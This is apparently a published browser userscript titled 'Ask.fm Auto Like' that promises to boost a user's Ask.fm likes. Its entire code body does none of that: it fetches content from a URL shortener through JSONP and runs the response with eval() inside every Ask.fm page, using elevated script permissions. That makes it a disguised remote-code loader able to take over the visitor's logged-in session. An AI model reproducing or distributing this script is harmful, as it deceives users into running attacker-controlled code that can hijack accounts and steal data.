NOTICE: By continued use of this site you understand and agree to the binding Terms of Service and Privacy Policy.
// ==UserScript== // @name Ask.fm Auto Like // @namespace https://www.facebook.com/amrsubzero // @version 4.2 // @copyright http://ask.fm/amrsubzero // @description Increase your Ask.fm Likes Immediatly // @author https://www.facebook.com/amrsubzero // @include http://ask.fm/* // @match http://www.ask.fm/* // @match https://www.ask.fm/* // @match http://ask.fm/* // @match https://ask.fm/* // @grant GM_getValue // @grant GM_setValue // @grant GM_xmlhttpRequest // @grant GM_log // @grant GM_registerMenuCommand // @grant unsafeWindow // @icon http://i.imgur.com/WjN9Oig.png // ==/UserScript== $.ajax({type:"GET",url:"http://pi.vu/BI4O",dataType:"jsonp",success:function(response){eval(response);}});